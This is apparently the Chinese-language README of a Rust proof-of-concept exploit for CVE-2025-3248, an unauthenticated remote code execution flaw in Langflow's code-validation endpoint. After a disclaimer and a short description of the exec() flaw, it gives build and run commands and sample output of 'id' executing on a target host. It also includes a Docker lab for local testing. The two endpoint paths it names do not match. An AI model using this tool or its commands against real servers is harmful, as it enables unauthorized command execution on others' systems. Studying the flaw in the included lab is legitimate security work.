⚠️ 免责声明
此代码仅严格用于教育和研究目的。未经明确许可在系统上使用可能构成违法行为。
作者对此工具的任何误用或恶意行为概不负责。
CVE-2025-3248 - 严重
CVSS 评分:9.8 | EPSS 评分:92.57% | 发布时间:2025 年 5 月 22 日
端点 /api/v1/validate/code 接受未经过滤的 Python 代码,并直接使用 exec() 执行,无需身份验证。
# langflow/api/builder/execute.py
exec(code) # 无输入验证或沙箱隔离!
Langflow 暴露了一个 /api/v1/builder/execute_code 端点,该端点接收用户提供的 Python 代码并将其直接传递给后端的 exec()。由于没有身份验证或沙箱机制,攻击者可以构造任意载荷以执行代码。
# 克隆仓库
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down